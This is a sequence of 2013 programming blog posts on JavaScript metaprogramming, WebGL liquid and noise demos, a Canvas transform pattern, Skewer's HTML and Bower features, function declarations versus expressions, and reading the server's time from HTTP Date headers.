Fortunately there’s a simple workaround. The built-in constructors do something useful for the most part when used without new. My personal favorite is the Boolean constructor. Without new it returns a primitive boolean based on the truthiness of its argument. It can be used to remove falsy values from an array.

[1, '', 'foo', 0, null].filter(Boolean);
// => [1, "foo"]

In the case of Function, new isn’t actually needed at all! This way, apply can be used with the constructor. This works as expected,

var add = Function.apply(null, ['x', 'y', 'return x + y']);

Here it is being used to generate functions of n arguments.

/** Return a function of n-args that sums its arguments. */
function addN(n) {
    var args = [];
    for (var i = 0; i < n; i++) {
        args.push('a' + i);
    }
    args.push('return ' + args.join(' + '));
    return Function.apply(null, args);
}

addN(5)(3, 4, 5, 6, 7);  // => 25

A single variadic function that uses the arguments special variable to sum its arguments could be used in place of these individual functions, but generating a function with a specific arity and using it many times will have much better performance than the variadic version.

function add() {
    var sum = 0;
    for (var i = 0; i < arguments.length; i++) {
        sum += arguments[i];
    }
    return sum;
}

function test(f, n) {
    var start = Date.now();
    for (var i = 0; i < n; i++) {
        f(3, 4, 5, 6, 7);
    }
    return (Date.now() - start) / 1000;
}

test(add,     10000000);  // => 0.698 seconds
test(addN(5), 10000000);  // => 0.152 seconds

In MonkeyScript, the metaprogramming approach is almost 5 times faster.

Liquid Simulation in WebGL

2013-06-26T00:00:00Z

Over a year ago I implemented a liquid simulation using a Box2D and Java 2D. It’s a neat trick that involves simulating a bunch of balls in a container, blurring the rendering of this simulation, and finally thresholding the blurred rendering. Due to my recent affection for WebGL, this week I ported the whole thing to JavaScript and WebGL.

nullprogram.com/fun-liquid/webgl/

Unlike the previous Java version, blurring and thresholding is performed entirely on the GPU. It should therefore be less CPU intensive and a lot more GPU intensive. Assuming a decent GPU, it will run at a (fixed) 60 FPS, as opposed to the mere 30 FPS I could squeeze out of the old version. Other than this, the JavaScript version should look pretty much identical to the Java version.

Box2D performance

I ran into a few complications while porting. The first was the performance of Box2D. I started out by using box2dweb, which is a port of Box2DFlash, which is itself a port of Box2D. Even on V8, the performance was poor enough that I couldn’t simulate enough balls to achieve the liquid effect. The original JBox2D version handles 400 balls just fine while this one was struggling to do about 40.

Brian suggested I try out the Box2D emscripten port. Rather than manually port Box2D to JavaScript, emscripten compiles the original C++ to JavaScript via LLVM, being so direct as to even maintain its own heap. The benefit is much better performance, but the cost is a difficult API. Interacting with emscripten-compiled code can be rather cumbersome, and this emscripten port isn’t yet fully worked out. For example, creating a PolygonShape object involves allocating an array on the emscripten heap and manipulating a pointer-like thing. And when you screw up, the error messages are completely unhelpful.

Moving to this other version of Box2D allowed me to increase the number of balls to about 150, which is just enough to pull off the effect. I’m still a bit surprised how slow this is. The computation complexity for this is something like an O(n^2), so 150 is a long ways behind 400. I may revisit this in the future to try to get better performance by crafting my own very specialized physics engine from scratch.

WebGL complexity

Before I even got into writing the WebGL component of this, I implemented a 2D canvas display, without any blurring, just for getting Box2D tuned. If you visit the demonstration page without a WebGL-capable browser you’ll see this plain canvas display.

Getting WebGL to do the same thing was very simple. I used GL_POINTS to draw the balls just like I had done with the sphere demo. To do blurring I would need to render this first stage onto an intermediate framebuffer, then using this framebuffer as an input texture I would blur and threshold this into the default framebuffer.

This actually took me awhile to work out, much longer than I had anticipated. To prepare this intermediate framebuffer you must first create and configure a texture. Then create and configure a renderbuffer to fill in as the depth buffer. Then finally create the framebuffer and attach both of these to it. Skip any step and all you get are some vague WebGL warnings. (With regular OpenGL it’s worse, since you get no automatic warnings at all.)

WebGL textures must have dimensions that are powers of two. However, my final output does not. Carefully rendering onto a texture with a different aspect ratio and properly sampling the results back off introduces an intermediate coordinate system which mucks things up a bit. It took me some time to wrap my head around it to work everything out.

Finally, once I was nearly done, my fancy new shader was consistently causing OpenGL to crash, taking my browser down with it. I had to switch to a different computer to continue developing.

The GPU as a bottleneck

For the second time since I’ve picked up WebGL I have overestimated graphics cards’ performance capabilities. It turns out my CPU is faster at convolving a 25x25 kernel — the size of the convolution kernel in the Java version — than any GPU that I have access to. If I reduce the size of the kernel the GPU gets its edge back. The only way to come close to 25x25 on the GPU is to cut some corners. I finally settled on an 19x19 kernel, which seems to work just about as well without being horribly slow. I may revisit this in the future so that lower-end GPUs can run this at 60 FPS as well.

Conclusion

I’m really happy with the results, and writing this has been a good exercise in OpenGL. I completely met one of my original goals: to look practically identical to the original Java version. I mostly met my second, performance goal. On my nice desktop computer it runs more than twice as fast, but, unfortunately, it’s very slow my tablet. If I revisit this project in the future, the purpose will be to optimize for these lower-end, mobile devices.

This project has also been a useful testbed for a low-level WebGL wrapper library I’m working on called Igloo, which I’ll cover in a future post.

An HTML5 Canvas Design Pattern

2013-06-16T00:00:00Z

I’ve been falling into a particular design pattern when using the HTML5 Canvas element. By “design pattern” I don’t mean some pretty arrangement but rather a software design pattern. This one’s a very Lisp-like pattern, and I wonder if I would have come up with it if I hadn’t first seen it in Lisp. It can also be applied to the Java 2D API, though less elegantly.

First, a review.

Drawing Basics

A canvas is just another element in the page.

 id="display" width="200" height="200">

To draw onto it, get a context and call drawing methods on it.

var ctx = document.getElementById('display').getContext('2d');
ctx.fillStyle = 'blue';
ctx.beginPath();
ctx.arc(100, 100, 75, 0, Math.PI * 3 / 2);
ctx.fill();

This will result in a canvas that looks like this,

Here’s how to do the same thing with Java 2D. Very similar, except the canvas is called a JComponent and the context is called a Graphics2D. As you could imagine from this example, Java 2D API is much richer, and more object-oriented than the Canvas API. The cast from Graphics to Graphics2D is required due to legacy.

public class Example extends JComponent {
    public void paintComponent(Graphics graphics) {
        Graphics2D g = (Graphics2D) graphics;
        g.setColor(Color.BLUE);
        g.fill(new Arc2D.Float(25, 25, 150, 150, 0, 360, Arc2D.CHORD));
    }
}

An important feature of both is the ability to globally apply transforms — translate, scale, shear, and rotate — to all drawing commands. For example, drawings on the canvas can be vertically scaled using the scale() method. Graphics2D also has a scale() method.

// ...
ctx.scale(1, 0.5);
// ...

For both JavaScript and Java the rendered image isn’t being stretched. Instead, the input vertices are being transformed before rendering to pixels. This is what makes it possible to decouple the screen coordinate system from the program’s internal coordinate system. Outside of rare performance concerns, the program’s internal logic shouldn’t be written in terms of pixels. It should rely on these transforms to convert between coordinate systems at rendering time, allowing for a moving camera.

The Transform Stack

Both cases also allow the current transform to be captured and restored. Not only does this make it easier for a function to clean up after itself and properly share the canvas with other functions, but also multiple different coordinate transforms can be stacked on top of each other. For example, the bottom transform might convert between internal coordinates and screen coordinates. When it comes time to draw a minimap, another transform can be pushed on top and the same exact drawing methods applied to the canvas.

This is where Canvas and Java 2D start to differ. Both got some aspect right and some aspect wrong, and I wish I could easily have the best of both.

In canvas, this is literally a stack, and there are a pair of methods, save() and restore() for pushing and popping the transform matrix on an internal stack. The above JavaScript example may be in a function that is called more than once, so it should restore the transform matrix before returning.

ctx.save();
ctx.scale(1, 0.5);
// ... draw ...
ctx.restore();

In Java this stack is managed manually, and it (typically) sits inside the call stack itself as a variable.

AffineTransform tf = g.getTransform();
g.scale(1, 0.5);
// ... draw ...
g.setTransform(tf);

I think Canvas’s built-in stack is more elegant than managing an extraneous variable and object. However, what’s significant about Java 2D is that we actually have access to the transform matrix. It’s that AffineTransform object. The Canvas transform matrix is an internal, inaccessible data structure. It has an established external representation, SVGMatrix, but it won’t provide a copy. If one of these is needed, a separate matrix must to be maintained in parallel. What a pain!

Why would we need the transform matrix? So that we can transform coordinates in reverse! When a user interacts with the display, the program receives screen coordinates. To be useful, these need to be converted into internal coordinates so that the program can determine where in the world the user clicked. The Java AffineTransform class has a createInverse() method for computing this inverse transform. This is something I really miss having when using Canvas. It’s such an odd omission.

The Design Pattern

So, back to the design pattern. When it comes time draw something, a transform is established on the context, something is drawn to the context, then finally the transform is removed. The word “finally” should stand out here. If we’re being careful, we should put the teardown step inside a finally block. If something goes wrong, the context will be left in a clean state. This has personally helped me in debugging.

ctx.save();
ctx.scale(1, 0.5);
try {
    // ... draw ...
} finally {
    ctx.restore();
}

In Lisp, this pattern is typically captured as a with- macro.

Perform setup
Run body
Teardown
Return the body’s return value

Instead of finally, the special form unwind-protect is used to clean up regardless of any error condition. Here’s a simplified version of Emacs’ with-temp-buffer macro, which itself is built on another with- macro, with-current-buffer.

(defmacro with-temp-buffer (&rest body)
  `(let ((temp-buffer (generate-new-buffer " *temp*")))
     (with-current-buffer temp-buffer
       (unwind-protect
           (progn ,@body)
         (kill-buffer temp-buffer)))))

The setup is to create a new buffer and switch to it. The teardown destroys the buffer, regardless of what happens in the body. An example from Common Lisp would be with-open-file.

(with-open-file (stream "/etc/passwd")
  (loop while (listen stream)
     collect (read-line stream)))

This macro ensures that the stream is closed when the body exits, no matter what. (Side note: this can be very surprising when combined with Clojure’s laziness!)

There are no macros in JavaScript, let alone Lisp’s powerful macro system, but the pattern can still be captured using closures. Replace the body with a callback.

function Transform() {
    // ...
}

// ...

Transform.prototype.withDraw = function(ctx, callback) {
    ctx.save();
    this.applyTransform(ctx);
    try {
        callback();
    } finally {
        ctx.restore();
    }
};

The callback is called once the context is in the proper state. Here’s how it would be used.

var transform = new Transform().scale(1, 0.5);  // (fluent API)

function render(step) {
    transform.withDraw(ctx, function() {
        // ... draw ...
    });
}

Since JavaScript has proper closures, that step variable is completely available to the callback. This function-as-body pattern comes up a lot (e.g. AMD), and seeing it work so well makes me think of JavaScript as a “suitable Lisp.”

Java can just barely pull off the pattern using anonymous classes, but it’s very clunky.

class Transform {
    // ...

    AffineTransform transform;

    public void withDraw(Graphics2D g, Runnable callback) {
        AffineTransform original = g.getTransform();
        g.transform(transform);
        try {
            callback.run();
        } finally {
            g.setTransform(original);
        }
    }
}

class Foo {
    // ...

    Transform transform;

    public void render(Graphics2D g, double step) {
        transform.withDraw(g, new Runnable() {
            public void run() {
                // ... draw ...
            }
        });
    }
}

Java’s anonymous classes are closures, but, unlike Lisp and JavaScript, they close over values rather than bindings. Purely in attempt to hide this complexity, Java requires that variables accessed from the anonymous class be declared as final. It’s awkward and confusing enough that I probably wouldn’t try to apply it in Java.

I think this pattern works very well with JavaScript, and if you dig around in some of my graphical JavaScript you’ll see that I’ve already put it to use. JavaScript functions work pretty well as a stand in for some kinds of Lisp macros.

Long Live WebGL

2013-06-10T00:00:00Z

On several occasions over the last few years I’ve tried to get into OpenGL programming. I’d sink an afternoon into attempting to learn it, only to get frustrated and quit without learning much. There’s a lot of outdated and downright poor information out there, and a beginner can’t tell the good from the bad. I tried using OpenGL from C++, then Java (lwjgl), then finally JavaScript (WebGL). This last one is what finally stuck, unlocking a new world of projects for me. It’s been very empowering!

I’ll explain why WebGL is what finally made OpenGL click for me.

Old vs. New

I may get a few details wrong, but here’s the gist of it.

Currently there are basically two ways to use OpenGL: the old way (compatibility profile, fixed-function pipeline) and the new way (core profile, programmable pipeline). The new API came about because of a specific new capability that graphics cards gained years after the original OpenGL specification was written. This is, modern graphics cards are fully programmable. Programs can be compiled with the GPU hardware as the target, allowing them to run directly on the graphics card. The new API is oriented around running these programs on the graphics card.

Before the programmable pipeline, graphics cards had a fixed set of functionality for rendering 3D graphics. You tell it what functionality you want to use, then hand it data little bits at a time. Any functionality not provided by the GPU had to be done on the CPU. The CPU ends of doing a lot of the work that would be better suited for a GPU, in addition to spoon-feeding data to the GPU during rendering.

With the programmable pipeline, you start by sending a program, called a shader, to the GPU. At the application’s run-time, the graphics driver takes care of compiling this shader, which is written in the OpenGL Shading Language (GLSL). When it comes time to render a frame, you prepare all the shader’s inputs in memory buffers on the GPU, then issue a draw command to the GPU. The program output goes into another buffer, probably to be treated as pixels for the screen. On it’s own, the GPU processes the inputs in parallel much faster than a CPU could ever do sequentially.

An very important detail to notice here is that, at a high level, this process is almost orthogonal to the concept of rendering graphics. The inputs to a shader are arbitrary data. The final output is arbitrary data. The process is structured so that it’s easily used to render graphics, but it’s not strictly required. It can be used to perform arbitrary computations.

This paradigm shift in GPU architecture is the biggest barrier to learning OpenGL. The apparent surface area of the API is doubled in size because it includes the irrelevant, outdated parts. Sure, the recent versions of OpenGL eschew the fixed-function API (3.1+), but all of that mess still shows up when browsing and searching documentation. Worse, there are still many tutorials that teach the outdated API. In fact, as of this writing the first Google result for “opengl tutorial” turns up one of these outdated tutorials.

OpenGL ES and WebGL

OpenGL for Embedded Systems (OpenGL ES) is a subset of OpenGL specifically designed for devices like smartphones and tablet computers. The OpenGL ES 2.0 specification removes the old fixed-function APIs. What’s significant about this is that WebGL is based on OpenGL ES 2.0. If the context a discussion is WebGL, you’re guaranteed to not be talking about an outdated API. This indicator has been a really handy way to filter out a lot of bad information.

In fact, I think the WebGL specification is probably the best documentation root for exploring OpenGL. None of the outdated functions are listed, most of the descriptions are written in plain English, and they all link out to the official documentation if clarification or elaboration is needed. As I was learning WebGL it was easy to jump around this document to find what I needed.

This is also a reason to completely avoid spending time learning the fixed-function pipeline. It’s incompatible with WebGL and many modern platforms. Learning it would be about as useful as learning Latin when your goal is to communicate with people from other parts of the world.

The Fundamentals

Now that WebGL allowed me to focus on the relevant parts of OpenGL, I was able to spend effort into figuring out the important stuff that the tutorials skip over. You see, even the tutorials that are using the right pipeline still do a poor job. They skip over the fundamentals and dive right into 3D graphics. This is a mistake.

I’m a firm believer that mastery lies in having a solid grip on the fundamentals. The programmable pipeline has little built-in support for 3D graphics. This is because OpenGL is at its essence a 2D API. The vertex shader accepts something as input and it produces 2D vertices in device coordinates (-1 to 1) as output. Projecting this something to 2D is functionality you have to do yourself, because OpenGL won’t be doing it for you. Realizing this one fact was what really made everything click for me.

Many of the tutorials try to handwave this part. “Just use this library and this boilerplate so you can ignore this part,” they say, quickly moving on to spinning a cube. This is sort of like using an IDE for programming and having no idea how a build system works. This works if you’re in a hurry to accomplish a specific task, but it’s no way to achieve mastery.

More so, for me the step being skipped is perhaps the most interesting part of it all! For example, after getting a handle on how things worked — without copy-pasting any boilerplate around — I ported my OpenCL 3D perlin noise generator to GLSL.

/perlin-noise/ (source)

Instead of saving off each frame as an image, this just displays it in real-time. The CPU’s only job is to ask the GPU to render a new frame at a regular interval. Other than this, it’s entirely idle. All the computation is being done by the GPU, and at speeds far greater than a CPU could achieve.

Side note: you may notice some patterns in the noise. This is because, as of this writing, I’m still working out decent a random number generation in the fragment shader.

If your computer is struggling to display that page it’s because the WebGL context is demanding more from your GPU than it can deliver. All this GPU power is being put to use for something other than 3D graphics! I think that’s far more interesting than a spinning 3D cube.

Spinning 3D Sphere

However, speaking of 3D cubes, this sort of thing was actually my very first WebGL project. To demonstrate the biased-random-point-on-a-sphere thing to a co-worker (outside of work), I wrote a 3D HTML5 canvas plotter. I didn’t know WebGL yet.

HTML5 Canvas 2D version (source) (ignore the warning)

On a typical computer this can only handle about 4,000 points before the framerate drops. In my effort to finally learn WebGL, I ported the display to WebGL and GLSL. Remember that you have to bring your own 3D projection to OpenGL? Since I had already worked all of that out for the 2D canvas, this was just a straightforward port to GLSL. Except for the colored axes, this looks identical to the 2D canvas version.

WebGL version (a red warning means it’s not working right!)

This version can literally handle millions of points without breaking a sweat. The difference is dramatic. Here’s 100,000 points in each (any more points and it’s just a black sphere).

A Friendly API

WebGL still three major advantages over other OpenGL bindings, all of which make it a real joy to use.

Length Parameters

In C/C++ world, where the OpenGL specification lies, any function that accepts an arbitrary-length buffer must also have an parameter for the buffer’s size. Due to this, these functions tend to have a lot of parameters! So in addition to OpenGL’s existing clunkiness there are these length arguments to worry about.

Not so in WebGL! Since JavaScript is a type-safe language, the buffer lengths are stored with the buffers themselves, so this parameter completely disappears. This is also an advantage of Java’s lwjgl.

Resource Management

Any time a shader, program, buffer, etc. is created, resources are claimed on the GPU. Long running programs need to manage these properly, destroying them before losing the handle on them. Otherwise it’s a GPU leak.

WebGL ties GPU resource management to JavaScript’s garbage collector. If a buffer is created and then let go, the GPU’s associated resources will be freed at the same time as the wrapper object in JavaScript. This can still be done explicitly if tight management is needed, but the GC fallback is there if it’s not done.

Because this is untrusted code interacting with the GPU, this part is essential for security reasons. JavaScript programs can’t leak GPU resources, even intentionally.

Unlike the buffer length advantage, lwjgl does not do this. You still need to manage GPU resources manually in Java, just as you would C.

Live Interaction

Perhaps most significantly of all, I can drive WebGL interactively with Skewer. If I expose shader initialization properly, I can even update the shaders while the display running. Before WebGL, live OpenGL interaction is something that could only be achieved with the Common Lisp OpenGL bindings (as far as I know).

It’s really cool to be able to manipulate an OpenGL context from Emacs.

The Future

I’m expecting to do a lot more with WebGL in the future. I’m really keeping my eye out for an opportunity to combine it with distributed web computing, but using the GPU instead of the CPU. If I find a problem that fits this infrastructure well, this system may be the first of its kind: visit a web page and let it use your GPU to help solve some distributed computing problem!

Skewer Gets HTML Interaction

2013-06-01T00:00:00Z

A month ago Zane Ashby made a pull request that added another minor mode to Skewer: skewer-html-mode. It’s analogous to the skewer-css minor mode in that it evaluates HTML “expressions” in the context of the current page. The original pull request was mostly a proof of concept, with evaluated HTML snippets being appended to the end of the page (body) unless a target selector is manually specified.

This mode is still a bit rough around this edges, but since I think it’s useful enough for productive work I’ve merged it in.

Replacing HTML

Unsatisfied with just appending content, I ran with the idea and updated it to automatically replace structurally-matching content on the page when possible. Zane’s fundamental idea remained intact: a CSS selector is sent to the browser along with the HTML. Skewer running in the browser uses querySelector() to find the relevant part of the document and replaces it with the provided HTML. This is done with the command skewer-html-eval-tag (default: C-M-x), which selects the innermost tag enclosing the point.

To accomplish this, an important piece of skewer-html exists to compute this CSS selector. It’s a purely structural selector, ignoring classes, IDs, and so on, instead relying on the pseudo-selector :nth-of-type. For example, say this is the content of the buffer and the point is somewhere inside the second heading (Bar).


  
  
     id="main">
      Foo
      I am foo.
      Bar
      I am bar.

The function skewer-html-compute-selector will generate this selector. Note that :nth-of-type is 1-indexed.

body:nth-of-type(1) > div:nth-of-type(1) > h1:nth-of-type(2)

The > syntax requires that these all be direct descendants and :nth-of-type allows it to ignore all those paragraph elements. This means other types of elements can be added around these headers, like additional paragraphs, without changing the selector. The :nth-of-type on body is obviously unnecessary, but this is just to keep skewer-html dead simple. It doesn’t need to know the semantics of HTML, just the surface syntax. There will only ever be one body tag, but to skewer-html it’s just another HTML tag.

Side note: this is why I strongly prefer to use /> self-closing syntax in HTML5 even though it’s unnecessary. Unlike XML, that closing slash is treated as whitespace and it’s impossible to self-close tags. The schema specifies which tags are “void” (always self-closing: img, br) and which tags are “normal” (explicitly closed: script, canvas). This means if you don’t use /> syntax, your editor would need to know the HTML5 schema in order to properly understand the syntax. I prefer not to require this of a text editor — or anything else doing dumb manipulations of HTML text — especially with the HTML5 specification constantly changing.

When I was writing this I originally included html in the selector. Selector computation would just walk up to the root of the document regardless of what the tags were. Curiously, including this causes the selector to fail to match even though this is literally the page structure. So, out of necessity, skewer-html knows enough to leave it off.

For replacement, rather than a simple innerHTML assignment on the selected element, Skewer is parsing the HTML into an node object, removing the selected node object, and putting the new one in its place. The reason for this is that I want to include all of the replacement element’s attributes.

Another HTML oddity is that the body and head elements cannot be replaced. It’s a limitation of the DOM. This means these tags cannot be “evaluated” directly, only their descendants. Brian and I also ran into this issue in impatient-mode while trying to work around a strange HTML encoding corner case: scripts loaded with a script tag created by document.write() are parsed with a different encoding than when loaded directly by adding a script element to the page.

This last part is actually a small saving grace for skewer-css, which works by appending new stylesheets to the end of body. Why body and not head? Because some documents out there have stylesheets linked from body, and properly overriding these requires appending stylesheets after them. If body is replaced by skewer-html, all of the dynamic stylesheets appended by skewer-css would be lost, reverting the style of the page. Since we can’t do that, this isn’t an issue!

Appending HTML

So what happens when the selector doesn’t match anything in the current document? Skewer fills in the missing part of the structure and sticks the content in the right place. Next time the tag is evaluated, the structure exists and it becomes a replacement operation. This means the document in the browser can start completely empty (like the run-skewer page) and you can fill in content as you write it.

But what if the page already has content? There’s an interactive command skewer-html-fetch-selector-into-buffer. You select a part of the page and it gets inserted into the current buffer (probably a scratch buffer). The idea is that you can then modify and then evaluate it to update the page. This is the roughest part of skewer-html right now since I’m still figuring out a good workflow around it.

If you have Skewer installed and updated, you already have skewer-html. It was merged into master about a month ago. If you have any ideas or opinions for how you think this minor mode should work, please share it. The intended workflow is still not a fully-formed idea.

Load Libraries in Skewer with Bower

2013-05-18T00:00:00Z

I recently added support to Skewer for loading libraries on the fly using Bower’s package infrastructure. Just make sure you’re up to date, then while skewering a page run M-x skewer-bower-load. It will prompt for a package and version, download the library, then inject it into the currently skewered page.

Because the Bower infrastructure is so simple, Bower is not actually needed in order to use this. Only Git is required, configured by skewer-bower-git-executable, which it tries to configure itself from Magit if it’s been loaded.

Motivation

Skewer comes with a userscript that adds a small toggle button to the top-right corner every page I visit. Here’s a screenshot of the toggle on this page.

When that little red triangle is clicked, the page is connected to Emacs and the triangle turns green. Click it again and it disconnects, turning red. It remembers its state between page refreshes so that I’m not constantly having to toggle.

It’s mainly for development purposes, but it’s occasionally useful to Skewer an arbitrary page on the Internet so that I can poke at it from Emacs. One habit that I noticed comes up a lot is that I want to use jQuery as I fiddle with the page, but jQuery isn’t actually loaded for this page. What I’ll do is visit a jQuery script in Emacs and load this buffer (C-c C-k). As expected, this is tedious and easily automated.

Rather than add specific support for jQuery, I thought it would be more useful to hook into one of the existing JavaScript package managers. Not only would I get jQuery but I’d be able to load anything else provided by the package manager. This means if I learn about a cool new library, chances are I could just switch to my *javascript* scratch buffer, load the library with this new Skewer feature, and play with it. Very convenient.

How it Works

There are a number of package managers out there. I chose Bower because of its emphasis on client-side JavaScript and, more so, because its infrastructure is so simple that I wouldn’t actually need to use Bower itself to access it. In adding this feature to Skewer, I wrote half a Bower client from scratch very easily.

The only part of the Bower infrastructure hosted by Bower itself is a tiny registry that maps package names to Git repositories. This host also accepts new mappings, unauthenticated, for registering new packages. The entire database is served up as plain old JSON.

https://bower.herokuapp.com/packages

To find out what versions are available, clone this repository with Git and inspect the repository tags. Tags that follow the Semantic Versioning scheme are versions of the package available for use with Bower. Once a version is specified, look at bower.json in the tree-ish referenced by that tag to get the rest of the package metadata, such as dependencies, endpoint listing, and description.

This is all very clever. The Bower registry doesn’t have to host any code, so it remains simple and small. It could probably be rewritten from scratch in 15-30 minutes. Almost all the repositories are on GitHub, which most package developers are already comfortable with. Package maintainers don’t need to use any tools or interact with any new host systems. Except for adding some metadata they just keep doing what they’re doing. I think this last point is a big part of MELPA’s success.

Bower’s Fatal Weaknesses

Unfortunately Bower has two issues, one of which is widespread, that seriously impacts its usefulness.

Dependency Specification

Even though Bower specifies Semantic Versioning for package versions, which very precisely describes version syntax and semantics, the dependencies field in bower.json is underspecified. There’s no agreed upon method for specifying relative dependency versions.

Say your package depends on jQuery and it relies on the newer jQuery 1.6 behavior of attr(). You would mark down that you depend on jQuery 1.6.0. Say a user of your package is also using another package that depends on jQuery, it’s using the on() method, which requires jQuery 1.7 or newer. It specifies jQuery 1.7.0. This is a dependency conflict.

Of course your package works perfectly fine with 1.7.0. It works fine at 1.6.0 and later. In other package management systems, you would probably have marked that you depend on “>=1.6.0” rather than just 1.6.0. Unfortunately, Bower doesn’t specify this as a valid dependency version. Some package maintainers have gone ahead and specified relative versions anyway, but inconsistently. Some use the “>=” prefix like I did above, some prefix with “~” (“about this version”), which is pretty useless.

And this leads into the other flaw.

Most Bower Packages are Broken

While some parts of Bower are underspecified, most packages don’t follow the simple specifications that already exist! That is to say, most Bower packages are broken. This is incredibly unfortunate because it means at least half of the packages can’t be loaded by this new Skewer feature.

How are they broken? As of this writing, there are 2,195 packages list in Bower’s registry.

113 (5%) of them have unreachable or unresponsive repositories. About half of these are due to invalid repository URLs.
1,830 (83%) have no bower.json metadata file. This means the client has to guess at the metadata.
1,034 (47%) have unguessable endpoints. My client looks for other package management metadata outside of Bower’s, as well as tries to guess base on the package name. Failing to guess causes the package to fail to load. These packages aren’t a subset of the last set with missing bower.json files. Sometimes the bower.json files contain incorrect information, which causes my client to drop into guessing mode.
1400 (64%) don’t use Semantic Versioning: either no versioning at all or some other arbitrary versioning system.
In total, 2041 (93%) of all Bower packages have invalid or missing metadata — bad registry entry, missing bower.json file, or lack of semantic version tags.

The good news is that most of the important libraries, like jQuery and Underscore, work properly. I’ve also registered two of my JavaScript libraries, ResurrectJS and rng-js, so these can be loaded on the fly in Skewer.

JavaScript Function Statements vs. Expressions

2013-05-14T00:00:00Z

The JavaScript function keyword has two meanings depending on how it’s used: as a statement or as an expression. It’s a statement when the keyword appears at the top-level of a block. This is known as a function declaration.

function foo() {
    // ...
}

This statement means declare a variable called foo in the current scope, create a closure named foo, and assign this closure to this variable. Also, this assignment is “lifted” such that it happens before any part of the body of the surrounding function is evaluated, including before any variable assignments.

Notice that the closure’s name is separate from the variable name. Except for a certain well-known JavaScript engine, closure/function objects have a read-only name property.

foo.name; // => "foo"

A name is required for function declarations, otherwise they would be no-ops. This name also appears in debugging backtraces.

A function’s name has different semantics in function expressions. The function keyword is an expression when used in an expression position of a statement.

var foo = function() {
    // ...
}

The function expression above evaluates to an anonymous closure, which is then assigned to the variable foo. This is nearly identical to the previous function declaration except for two details.

Explicit variable assignments are never lifted, unlike function declarations. This assignment will happen exactly where it appears in the code.
The resulting closure is anonymous. The name property, if available, will be an empty string. Furthermore, the lack of name affects the scope of the function. I’ll get back to that point in a moment.

IIFEs

An immediately-invoked function expression (IIFE), used to establish a one-off local scope, is typically wrapped in parenthesis. The purpose of the parenthesis is to put function in an expression position so that it is a function expression rather than a function declaration.

(function() {
    // ... declare variables, etc.
}());

Another way to put function in an expression position is to precede it with an unary operator. This is an example of being clever instead of practical.

!function() {
    // ... declare variables, etc.
}();

If function is already in an expression position, the wrapping parenthesis are unnecessary. For example,

var foo = function() { return "bar"; }();
foo; // => "bar"

However, it may still be a good idea to wrap the IIFE in parenthesis just to help other programmers read your code. A casual glance that doesn’t notice the function invocation would assume a function is being assigned to foo. Wrapping a function expression with parenthesis is a well-known idiom for IIFEs.

Function Name and Scope

What happens when a function expression is given a name? Two things.

The name will appear in the name property of the closure (if available). Also, the name will also show up in backtraces. This makes naming closures a handy debugging technique.
The name becomes a variable in the scope of the function. This means it’s possible to write recursive function expressions!

function maths() {
    return {
        // ...
        fact: function fact(n) {
            return n === 0 ? 1 : n * fact(n - 1);
        }
    };
}

maths().fact(10); // => 3628800

The fact function is evaluated as a function expression as part of this object literal. The variable fact is established in the scope of the function fact, assigned to the function itself, allowing the function to call itself. It’s a self-contained recursive function.

Pop Quiz: Function Name and Scope

Given this, try to determine the answer to this problem in your head. What does the second invocation of foo evaluate to?

function foo() {
    foo = function() {
        return "function two";
    };
    return "function one";
}

foo(); // => "function one"
foo(); // => ???

Here’s where we come to the major difference between function declarations and function expressions. The answer is "function two". Even though functions declarations create named functions, these functions do not have the implicit self-named variable in its scope. Unless this variable is declared explicitly, the name will refer to a variable in a containing scope.

This has the useful property that a function can re-define itself and be correctly named at the same time. If the function needs to perform expensive first-time initialization, such reassignment can be used to do it lazily without exposing any state and without requiring an is-initialized check on each invocation. For example, this trick is exactly how Emacs autoloading works.

If this function declaration is converted to what appears to be the equivalent function expression form the difference is obvious.

var foo = function foo() {
    foo = function() {
        return "function two";
    };
    return "function one";
};

foo(); // => "function one"
foo(); // => "function one"

The reassignment happens in the function’s scope, leaving the outer scope’s assignment intact. For better or worse, even ignoring assignment lifting, there’s no way to perfectly emulate function declaration using a function expression.

Inventing a Datetime Web Service

2013-05-11T00:00:00Z

Recently I wanted to experiment with dates in a JavaScript web app. The JavaScript Date object is a fairly decent tool for working with dates. Unfortunately, it has some annoyances,

It doesn’t play well with JSON. JSON.stringify() flattens it into a string, so the JSON.parse() on the other size doesn’t turn it back into a Date object. I made a library, ResurrectJS, to deal with this.
Dates are mutable. The same mistake was made in Java in the last century. However, in the JavaScript world this isn’t really a big deal. The language doesn’t really support immutability well at the moment anyway. There is Object.freeze() but JavaScript engines don’t optimize for it yet.
Inconsistent indexing. Months are 0-indexed while days are 1-indexed. The date “2013-05-11” is awkwardly instantiated with the arguments new Date(2013, 4, 11). This is another repeat of an early Java design mistake.
Date objects have timezones and there’s no way to set the timezone. A Date represents an instance in time, regardless of the local timezone, and the timezone only matters when the Date is being formatted as a human-readable string. When formatting a Date into a string there’s no way to specify the timezone. There’s a getTimezoneOffset() method for asking about the Date’s timezone, but no corresponding setTimezoneOffset().
It relies on the local computer’s time. This isn’t actually a flaw in Date. Where else would it get the time? This just happened to be an obstacle for my particular experiment. This issue is also the purpose of this post.

Existing Datetime Services

So if I don’t trust the local system time to be precise, where can I get a more accurate time? Surely there are web services out there for it, right? NIST operates time.gov and maybe that has a web API for web applications. I don’t need to be super precise — a web API could never be — just within a couple of seconds.

Turns out there isn’t any such web service, at least not a reliable one. Yahoo used to provide one called getTime, but it’s been shut down. In my searches I also came across this:

http://json-time.appspot.com/time.json (GitHub)

It supports JSONP, which is almost exactly what I need. Unfortunately, it’s just a free Google App Engine app, so it’s unavailable most of the time due to being over quota. In fact, at the time of this writing it is down.

I could stand up my own server for the task, but that costs both time and money, so I’m not really interested in doing that. It’s liberating to build web apps that don’t require that I run a server. There are so many nice web APIs out there that do the hard part for me. I can just put my app on GitHub’s free static hosting, like this blog. The biggest obstacle is dealing with the same-origin policy. JSONP isn’t always supported and very few of these APIs support CORS, even though they easily could. This is part of the web that’s still maturing. My personal guess is that WebSockets will end up filling this role rather than CORS.

Deriving a Datetime Service

So I was thinking about how I could get around this. Surely some API out there includes a date in its response and I could just piggyback off that. This is when the lightbulb went off: web servers hand out date strings all the time! It’s a standard HTTP header: Date! Even my own web server does this.

function getServerDate() {
    var xhr = new XMLHttpRequest();
    xhr.open('HEAD', '/?nocache=' + Math.random(), false);
    xhr.send();
    return new Date(xhr.getResponseHeader('Date'));
}

This makes a synchronous XMLHttpRequest to the page’s host, being careful to cache bust so that I’m not handed a stale date. I’m also using a HEAD request to minimize the size of the response. Personally, I trust the server’s clock precision more than the client’s. Here it is in action.

Local: ---

Server: ---

